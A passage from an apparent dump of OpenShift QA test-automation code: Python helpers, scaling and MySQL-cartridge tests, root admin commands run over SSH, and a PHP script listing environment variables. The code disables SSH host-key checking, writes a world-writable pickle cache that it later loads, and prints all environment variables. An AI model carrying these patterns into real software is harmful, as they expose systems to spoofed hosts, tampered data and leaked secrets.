\"Debian\"\n elif os.path.isfile(\"/etc/fedora-release\"):\n fr = open(\"/etc/fedora-release\", \"r\")\n obj = re.search(r\"Fedora release (\\d+)\", fr.read())\n fr.close()\n return \"Fedora%s\"%obj.group(1)\n elif os.path.isfile(\"/etc/redhat-release\"):\n return \"RedHat\"\n elif os.path.isfile(\"/etc/lsb-release\"):\n return \"Ubuntu\"\n else:\n raise Exception(\"Unable to detect Linux distribution...\")\n\n\ndef dump_env():\n for k in os.environ.keys():\n print k,\"=\",os.environ[k]\n\ndef setup_rhc_client(version=None, branch=\"candidate\"):\n import setup_client\n return setup_client.do_setup(version, branch)\n\n\ndef inject_string_by_re(regex, injection, target, after=True):\n \"\"\"Inserts a string on the new line, if previous line matches regex\"\"\"\n #content = content[:pos] + new + content[pos:]\n injected = []\n rex = re.compile(r\"%s\"%regex)\n hit = 0 \n for line in target.split('\\n'):\n injected.append(line)\n if rex.search(line):\n if after:\n injected.append(injection)\n else:\n injected.insert(len(injected)-1, injection)\n hit += 1\n if hit == 0:\n log.warning(\"No injection!\")\n elif hit>1:\n log.warning(\"Multiple injection (%d)!\"%hit)\n return \"\\n\".join(injected)\n\n\ndef get_auth_headers(login, password):\n \"\"\"Returns dict() with HTTP authentication headers\"\"\"\n return {'Authorization' : \"Basic %s\"% base64.b64encode('%s:%s' % (login, password))}\n\n\ndef sshPKeyToFingerprint(pkey):\n import hashlib\n key = base64.b64decode(pkey)\n fp_plain = hashlib.md5(key).hexdigest()\n return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))\n\n\ndef setup_ssh_config():\n ssh_config = \"\"\"\nHost *.stg.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n #LogLevel DEBUG\n PreferredAuthentications publickey\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts.stg\n\nHost *.int.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n PreferredAuthentications publickey\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts.int\n\nHost *.dev.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n #LogLevel DEBUG\n PreferredAuthentications publickey\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts.dev\n\n\"\"\"\n cfile = os.path.expanduser(\"~/.ssh/config\")\n\n if not os.path.exists(cfile):\n write_file(cfile, ssh_config, mode=0600)\n else:\n for line in open(cfile):\n if \"Host *.dev.rhcloud.com\" in line:\n return \n append_file(cfile, ssh_config, mode=0600)\n\n" }, { "alpha_fraction": 0.6182265877723694, "alphanum_fraction": 0.6223316788673401, "avg_line_length": 23.85714340209961, "blob_id": "0bfc6e35c9f79431cf102559315baf7e1c639388", "content_id": "9977156947dcbb03407122653d8e6bd332826018", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 93, "num_lines": 49, "path": "/automation/open/testmodules/Collections/Demo/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\nimport common\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n self.msg = self.config.msg\n self.cart_type = self.config.tc_arguments['cart_type']\n self.variants = self.config.tc_arguments['variants']\n self.app_name = self.config.app_name + self.cart_type\n print \"############################\"\n #self.info(\"%s\" % self.config.tc_args.keys())\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self, args=None):\n #cart_type = common.app_types[self.cart_type]\n #self.info(\"Creating app for cartridge type '%s'\" % cart_type)\n # create an app\n #status, res = self.config.rest_api.app_create(self.app_name, cart_type, scale=False)\n #if status[0] == 'Created':\n return self.passed(\"Test passed.\")\n #else:\n #return self.failed(\"Test failed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5204607844352722, "alphanum_fraction": 0.5242434740066528, "avg_line_length": 40.248226165771484, "blob_id": "1b8722139653b9fd32f509c85c5a25b9380b5e2a", "content_id": "4530573665faac8e719a57d92c54768d920eec2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11632, "license_type": "no_license", "max_line_length": 114, "num_lines": 282, "path": "/automation/open/testmodules/RT/scaling/negative_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport OSConf\nimport common\nimport rhtest\nimport time\n# user defined packages\nimport fileinput, re\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1463][BusinessIntegration] Scale-up / Scale down an non-scalable application \")\n try:\n self.test_variant = self.get_variant()\n except Exception as e:\n self.info(\"Warning: no test_variant defined, used `php` as default\")\n self.test_variant = \"php\"\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.domain_name = common.get_domain_name()\n self.git_repo = './' + self.app_name\n common.env_setup()\n\n def finalize(self):\n pass\n \n\nclass NegativeScaling(OpenShiftTest):\n def configure_scale_up_test_application(self, git_repo):\n if self.test_variant == 'php':\n txt = \"<?php header('Content-Type: text/plain'); echo $_ENV['OPENSHIFT_GEAR_DNS']; ?>\"\n f_path = \"php/gear.php\"\n if self.test_variant == 'perl':\n txt = \"#!/usr/bin/perl\\n print 'Content-type: text/html\\r\\n\\r\\n';\\n print $ENV{'OPENSHIFT_GEAR_DNS'};\"\n f_path = \"perl/gear.pl\"\n cmd= \"touch %s\" % os.path.join(git_repo, f_path)\n os.system(cmd)\n if self.test_variant in (\"ruby\", \"ruby-1.9\"):\n f_path = \"config.ru\"\n try:\n for line in fileinput.input(git_repo + \"/config.ru\", inplace = 1):\n if re.search(\"map '/health' do\", line):\n print \"map '/gear.rb' do\"\n print \" gear_dns = proc do |env|\"\n print \" [ 200, { 'Content-Type' => 'text/plain'}, ENV['OPENSHIFT_GEAR_DNS'] ]\"\n print \" end\"\n print \" run gear_dns\"\n print \"end\"\n print\n print line\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n if self.test_variant == \"python\":\n f_path = \"wsgi/application\"\n try:\n for line in fileinput.input(git_repo + \"/wsgi/application\", inplace = 1):\n if re.search(\"PATH_INFO.+/env\", line):\n print \" elif environ['PATH_INFO'] == '/gear.py':\"\n print \" response_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n #print \"\\telif environ['PATH_INFO'] == '/gear.py':\"\n #print \"\\t\\tresponse_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n print line,\n except Exception as e:\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n\n if self.test_variant in ('jbossas', 'jbosseap', 'jbossews', 'jbossews2'):\n f_path = 'src/main/webapp/gear.jsp'\n gear_file = open(git_repo + \"/src/main/webapp/gear.jsp\", \"w\")\n gear_file.write(\"<%@ page contentType=\\\"text/plain\\\" language=\\\"java\\\" import=\\\"java.sql.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"javax.naming.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"java.util.*\\\" %>\\n\")\n gear_file.write(\"<%@ page trimDirectiveWhitespaces=\\\"true\\\" %>\\n\")\n gear_file.write(\"<%\\n\")\n gear_file.write(\"Map map = System.getenv();\\n\")\n gear_file.write(\"out.print(map.get(\\\"OPENSHIFT_GEAR_DNS\\\"));\\n\")\n gear_file.write(\"%>\\n\")\n gear_file.close() \n\n if self.test_variant == \"nodejs\":\n f_path = \"server.js\"\n try:\n for line in fileinput.input(git_repo + \"/server.js\", inplace = 1):\n if re.search(\"Handler for GET /health\", line):\n print \"app.get('/gear.js', function(req, res){\"\n print \" result = process.env.OPENSHIFT_GEAR_DNS;\"\n print \" res.send(result, {'Content-Type': 'text/plain'});\"\n print \"});\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n \n if self.test_variant in (\"php\", \"perl\"):\n f = open(os.path.join(git_repo, f_path), 'w')\n f.write(txt)\n f.close()\n\n configuration_steps = [\n \"cd %s\" % git_repo, \n \"git add %s\" % (f_path),\n \"git commit -a -m %s\" % (f_path),\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(configuration_steps))\n\n def number_of_gears(self):\n app_url = OSConf.get_app_url(self.app_name)\n gears = list()\n\n # Checking the output of gear dns script more times\n for i in range(1, 20):\n if self.test_variant == 'php':\n gear = common.fetch_page(str(app_url) + \"/gear.php\")\n if self.test_variant == 'perl':\n gear = common.fetch_page(str(app_url) + \"/gear.pl\")\n if self.test_variant in ('ruby', 'ruby-1.9'):\n gear = common.fetch_page(str(app_url) + \"/gear.rb\")\n if self.test_variant == 'python':\n gear = common.fetch_page(str(app_url) + \"/gear.py\")\n if self.test_variant in ('jbosseap', 'jbossas', 'jbossews', 'jbossews2'):\n if i==1: time.sleep(60)\n gear = common.fetch_page(str(app_url) + \"/gear.jsp\")\n if self.test_variant == 'nodejs':\n gear = common.fetch_page(str(app_url) + \"/gear.js\")\n if gear not in gears:\n gears.append(gear)\n print \"GEARS\", gears\n return len(gears)\n\n def test_method(self):\n self.add_step(\n \"Creating a non scalable %s application\"%self.test_variant,\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n True, \n self.git_repo],\n expect_description = \"The application must be created successfully\",\n expect_return = 0)\n\n ''' \n self.add_step(\n \"Scaling up via REST API\",\n self.config.rest_api.app_scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 'unprocessable_entity')\n '''\n\n self.add_step(\"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2) \n\n '''\n self.add_step(\"Scaling up via REST API\",\n self.config.rest_api.app_scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 'unprocessable_entity')\n '''\n\n self.add_step(\"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2)\n '''\n self.add_step(\"Scaling down via REST API\",\n self.config.rest_api.app_scale_down,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-down successfully\",\n expect_return = 'unprocessable_entity')\n '''\n self.add_step(\"Scaling down via REST API\",\n common.scale_down,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2)\n '''\n self.add_step(\n \"Embed with mysql\",\n common.embed,\n function_parameters = [ self.app_name, 'add-%s'%common.cartridge_types['mysql']],\n expect_description = \"The mysql must be embeded successfully\",\n expect_return = 0)\n '''\n '''\n self.add_step(\n \"Scaling up via REST API\",\n self.config.rest_api.app_scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 'unprocessable_entity')\n '''\n self.add_step(\"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2)\n\n\n # Checking web-page availability with refreshing\n for i in range(1,6):\n self.add_step(\"Checking web-page #%d\" % ( i ),\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0)\n\n self.add_step(\"Configuring the test application\",\n #self.configure_scale_up_test_application,\n common.inject_app_index_with_env,\n function_parameters = [ self.git_repo, self.app_type],\n expect_description = \"The application must be configured successfully\",\n expect_return = 0)\n\n self.add_step(\"Checking the number of gears (REST API)\",\n common.get_consumed_gears,\n expect_description = \"The number of gears must be '1'\",\n expect_return = 1)\n\n self.add_step(\"Checking the number of gears\",\n common.get_num_of_gears_by_web,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"The number of gears must be '1'\",\n expect_return = 1)\n \n '''\n self.add_step(\"Scaling down via REST API\",\n self.config.rest_api.app_scale_down,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-down successfully\",\n expect_return = 'Unprocessable Entity')\n '''\n\n # Checking web-page availability with refreshing\n for i in range(1,6):\n self.add_step(\"Checking web-page #%d\" % ( i ),\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0)\n \n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NegativeScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.3580246865749359, "alphanum_fraction": 0.3580246865749359, "avg_line_length": 12.5, "blob_id": "fb95903545883fe35f9f28250aebf6a07fc540ef", "content_id": "b7ba157256191ca74fef4f1d7627a266d7ed292b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 81, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/automation/open/testmodules/RT/cartridge/app_template/env_var/php/index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n foreach ($_ENV as $key=>$val )\n {\n echo $key.\"\\n\";\n }\n?>\n" }, { "alpha_fraction": 0.5710881948471069, "alphanum_fraction": 0.5744638442993164, "avg_line_length": 31.0732479095459, "blob_id": "ecc089ba3aa4d224382d6decbe8f2c82351b1fa0", "content_id": "9d5da2650ddaa7f58d4b433b2b81faa85e7ae6b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10072, "license_type": "no_license", "max_line_length": 219, "num_lines": 314, "path": "/automation/open/lib/common/admin.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from helper import *\nfrom misc import *\n\n\ndef add_application_template(template_tag, descriptor):\n \"\"\"\n This function copies the application template file (in yaml format) to the broker server\n and adds with the appropriate oo-admin command.\n \"\"\"\n\n template_file_name = \"%s/%s.yaml\" % (get_tmp_dir(), template_tag)\n template_file = open(template_file_name, \"w\")\n for line in descriptor.splitlines():\n template_file.write(line + \"\\n\")\n template_file.close()\n\n command_get_status(\n \"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 2>/dev/null -i %s %s root@%s:/tmp\" % ( get_root_ssh_key(), template_file_name, get_instance_ip())\n )\n\n return run_remote_cmd_as_root( \"oo-admin-ctl-template -c add -n %s -d %s -g git://github.com/openshift/wordpress-example.git -t wordpress --cost 1 -m '{ \\\"a\\\" : \\\"b\\\" }'\" % ( template_tag, template_file_name ))[0]\n\n\ndef get_consumed_gears(user=None):\n \"\"\"\n This functions returns the consumed_gears of the given user.\n * if the user is None => REST API (/user) for current user\n * else we use `oo-admin-ctl-user -l $user` to get this value\n * if error, returns None\n \"\"\"\n if user != None:\n #as root#\n (status, output) = run_remote_cmd_as_root(\"oo-admin-ctl-user -l %s\"%user)\n if status == 0:\n obj = re.search(r\"consumed gears:\\s+(\\d+)\", output)\n if obj:\n return int(obj.group(1))\n else:\n print \"ERROR: Unable to parse the max_gears for %s from oo-admin-ctl-user output.\"%user\n print output\n return None\n else:\n print \"ERROR: Unable to get the number of max_gears per %s.\"%user\n print output\n return None\n else:\n #as user from REST API\n (user, passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), user=user, passwd=passwd)\n (status, raw) = rest.get_user()\n if status == 'OK':\n return int(rest.rest.response.json['data']['consumed_gears'])\n else:\n print \"ERROR: %s,%s\"%(status, raw)\n return None\n\n\ndef get_max_gears(user=None):\n \"\"\"\n This functions returns the max_gears of the given user.\n * if the user is None => REST API (/user) for current user\n * else we use `oo-admin-ctl-user -l $user` to get this value\n * if error, returns None\n \"\"\"\n if user != None:\n #as root#\n (status, output) = run_remote_cmd_as_root(\"oo-admin-ctl-user -l %s\"%user)\n if status == 0:\n obj = re.search(r\"max gears:\\s+(\\d+)\", output)\n if obj:\n return int(obj.group(1))\n else:\n print \"ERROR: Unable to parse the max_gears for %s from oo-admin-ctl-user output.\"%user\n print output\n return None\n else:\n print \"ERROR: Unable to get the number of max_gears per %s.\"%user\n print output\n return None\n else:\n #as user from REST API\n rest = openshift.Openshift(host=get_instance_ip(), \n user=os.getenv(\"OPENSHIFT_user_email\"), \n passwd=os.getenv(\"OPENSHIFT_user_passwd\"))\n (status, raw) = rest.get_user()\n if status == 'OK':\n return int(rest.rest.response.json['data']['max_gears'])\n else:\n print \"ERROR: %s,%s\"%(status, raw)\n return None\n\n\ndef set_max_gears(user=None, max_gears=3):\n \"\"\"\n This functions configures the maximum number of gears the given\n user can consume.\n \"\"\"\n if user is None:\n (user, passwd) = get_default_rhlogin()\n return run_remote_cmd_as_root(\n \"oo-admin-ctl-user -l %s --setmaxgears %d\" % ( user, int(max_gears) )\n )[0]\n\n\ndef set_user_capability(capability, value=\"\", user=None):\n \"\"\"\n addgearsize [small, medium, ...]\n removegearsize [small, medium, ...]\n allowsubaccounts [true, false]\n inheritgearsizes [true, false]\n ...\n ...more from: oo-admin-ctl-user --help\n ...\n \"\"\"\n if user is None:\n (user, passwd) = get_default_rhlogin()\n cmd = \"oo-admin-ctl-user -l %s --%s %s\"%(user, capability, value)\n return run_remote_cmd_as_root(cmd)[0]\n\n\ndef remove_gearsize_capability(gearsize, user=None):\n if user is None:\n (user, passwd) = get_default_rhlogin()\n return set_user_capability('removegearsize', gearsize, user)\n\n\ndef add_gearsize_capability(gearsize, user=None):\n if user is None:\n (user, passwd) = get_default_rhlogin()\n return set_user_capability('addgearsize', gearsize, user)\n\n\ndef get_nodes():\n \"\"\"\n Returns a list of nodes running within broker\n When error, returns None\n \"\"\"\n (ret, output) = run_remote_cmd_as_root(\"mco ping\", quiet=True)\n if ret != 0:\n print \"ERROR:\", output\n return None\n\n nodes=[]\n for line in output.split('\\n'):\n obj = re.search(r\"^([^\\s]+)\\s+time=\", line)\n if obj:\n nodes.append(obj.group(1))\n\n return nodes\n\n\ndef destroy_district(district):\n cmd = \"oo-admin-ctl-district -c destroy -n %s\"%(district)\n return run_remote_cmd_as_root(cmd)\n\n\ndef create_district(district):\n cmd = \"oo-admin-ctl-district -c create -n %s\"%(district)\n return run_remote_cmd_as_root(cmd)\n\n\ndef add_node2district(district, hostname):\n cmd = \"oo-admin-ctl-district -c add-node -n %s -i %s\"%(district, hostname)\n return run_remote_cmd_as_root(cmd)[0]\n\n\ndef get_gears_per_node(node=None):\n \"\"\"\n Returns a list of the gears which reside on particular node\n \"\"\"\n (ret, output) = run_remote_cmd_as_root(\"ls -l /var/lib/openshift/\", node)\n if (ret != 0):\n print \"ERROR getting list of gears from node.\"\n return None\n l = {}\n for line in output.split('\\n'):\n obj = re.search(r\"^d.*\\s+([^\\s]+)$\", line)\n if obj:\n l[obj.group(1)] = None\n continue\n obj = re.search(r\"^l.*\\s+([^\\s]+)\\s+->\\s+([^\\s]+)$\", line)\n\n\ndef move_gear_between_nodes(gear_uuid, node_identity):\n cmd =\"oo-admin-move --gear_uuid %s --target_server_identity %s \"%(gear_uuid, node_identity)\n (ret, output) = run_remote_cmd_as_root2(cmd)\n if ret != 0:\n log.error(output)\n\n return ret\n\n\ndef get_districts():\n '''\n cmd = \"oo-admin-ctl-district\"\n (status, output) = run_remote_cmd_as_root2(cmd)\n print output\n return ruby_hash2python(output)\n '''\n from brokerdb import BrokerDB\n db = BrokerDB(collections='district')\n try:\n c = db.get_collection('district')\n if c is None:\n log.error(\"Problem getting collection of districts -> None\")\n return []\n except Exception as e:\n log.error(str(e))\n return []\n\ndef get_district_of_node(server_identity):\n \"\"\"\n Returns district name of given node's server_identity\n \"\"\"\n for ds in get_districts():\n for si in ds['server_identities']:\n if si['name'] == server_identity:\n return ds['name']\n return []\n\n\ndef get_users():\n from brokerdb import BrokerDB\n db = BrokerDB(collections='user')\n return db.get_collection('user')\n\n\ndef get_district_of_gear(gear_uuid):\n #1. get districts\n districts = get_districts()\n for d in districts:\n for si in d['server_identities']:\n node = si['name']\n p_node = get_public_ip(node)\n for g in get_gears_of_node(p_node).keys():\n if g == gear_uuid:\n return d['name']\n return None\n\n\ndef get_multi_node_env_setup():\n \"\"\"\n Returns dict of multi node current setup environment\n \"\"\"\n setup_file =get_msetup_file()\n if valid_cache(setup_file):\n f = open(setup_file, 'r')\n setup = pickle.load(f)\n f.close()\n return setup\n else:\n return setup_multi_node_env()\n\n\n#@exclusive\ndef setup_multi_node_env(district_name=None, force_cache=False):\n \"\"\"\n Adding all nodes to given district if not already have been assigned.\n Returns: \n {'nodes': [n1, n2,..], \n 'district': [{d1},...], \n 'user': [{user1},...]}\n Saves/uses dump in ~/tmp/msetup.openshift for 6hours\n \"\"\"\n log.info(\"Not yet fully tested/supported\")\n return None\n msetup_file = \"%s/msetup.openshift\"%get_tmp_dir()\n if district_name is None:\n district_name = getRandomString(10)\n try:\n if valid_cache(msetup_file) and not force_cache:\n f = open(msetup_file, 'rb')\n msetup = pickle.load(f)\n f.close()\n return msetup\n except Exception as e:\n log.error(\"Unable to read from (corrupted?) cache file %s: %s\"%(msetup_file, str(e)))\n if os.path.exists(msetup_file):\n os.unlink(msetup_file)\n\n nodes = get_nodes()\n for n in nodes : #got private IP addresses from `mco ping` \n ds = get_district_of_node(n)\n if ds is None:\n create_district(district_name)\n log.debug(\"Adding nodes to a district\")\n ret = add_node2district(district_name, n)\n if ret != 0:\n log.error(\"Unable to add a node[%s] to the district[%s].\"%(n, district_name))\n else:\n log.info(\"Node[%s] already belongs to district[%s]\"%(n, ds))\n\n from brokerdb import BrokerDB\n broker = BrokerDB()\n msetup = {'nodes': nodes, \n 'district': broker.get_collection('district'), \n 'user': broker.get_collection('users')}\n\n #Save file for later usage as cache\n if not os.path.exists(msetup_file) or not valid_cache(msetup_file) or force_cache:\n try:\n log.debug(\"Saving msetup file...\")\n oldumask = os.umask(0000)\n f = open(msetup_file, 'wb')\n pickle.dump(msetup, f)\n f.close()\n os.umask(oldumask)\n except Exception as e:\n log.error(e)\n return msetup\n\n\ndef get_msetup_file():\n return \"%s/msetup.openshift\"%get_tmp_dir()\n\n" }, { "alpha_fraction": 0.5902023315429688, "alphanum_fraction": 0.5968050956726074, "avg_line_length": 35.671875, "blob_id": "13ffbbf16a7f2b448bea5d9604d7a39407541710", "content_id": "13f6896d0c3b7395f67690735c0f3a10e544421c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4695, "license_type": "no_license", "max_line_length": 250, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_wsgi.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to WSGI/PYTHON application\nhttps://tcms.engineering.redhat.com/case/122453/?from_plan=4962\n\"\"\"\nimport os\nimport sys\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an WSGI application\"\n self.app_type = common.app_types[\"python\"]\n self.app_name = \"python4mysql\"\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToWsgi(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a WSGI app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def mod_config_ru(app_name):\n cmd = \"\"\"cd %s && cat <<'EOF' >>wsgi/application &&\n\nimport MySQLdb\n\ndef mysql():\n content=\"\"\n try:\n con=MySQLdb.connect(host=os.getenv(\"OPENSHIFT_MYSQL_DB_HOST\"), user=os.getenv(\"OPENSHIFT_MYSQL_DB_USERNAME\"), passwd=os.getenv(\"OPENSHIFT_MYSQL_DB_PASSWORD\"), db=os.getenv(\"OPENSHIFT_APP_NAME\"), port=int(os.getenv(\"OPENSHIFT_MYSQL_DB_PORT\")))\n cursor = con.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\nEOF\nsed -i '/response_body = \"1\"/a\\\\\n elif environ[\"PATH_INFO\"] == \"/mysql\":\\\\\n response_body = mysql()' wsgi/application &&\ngit commit -m \"changes\" -a && git push\"\"\"%self.app_name\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Modify config.ru for accepting /mysql\",\n mod_config_ru,\n function_parameters=[self.app_name],\n expect_description=\"The modifications should be done without errros\",\n expect_return=0))\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql\", 'Jeremy')\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n verify,\n function_parameters=[self],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToWsgi)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5738137364387512, "alphanum_fraction": 0.5782073736190796, "avg_line_length": 29.34666633605957, "blob_id": "49fac7f2d746010f4c2be9e6685a85812b94a33b", "content_id": "ec053165aca3600d0b84faab431d408aa1803200", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2276, "license_type": "no_license", "max_line_length": 184, "num_lines": 75, "path": "/automation/open/testmodules/RT/client/create_two_same_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"perl-5.10\"\n self.app_name = \"testapp\"\n tcms_testcase_id=98574\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\nclass CreateTwoSameApp(OpenShiftTest):\n def test_method(self):\n\n\tstep = testcase.TestCaseStep(\"Create the first app named %s\" %(self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd, False],\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create the second app with the same name - %s\" %(self.app_name),\n \"rhc app create %s %s -l %s -p '%s' --no-git %s\" %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_string_list=[\"already exists\"],\n )\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"Try to create two app with the same app\",\n self.steps_list\n )\n case.run()\n\t\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = 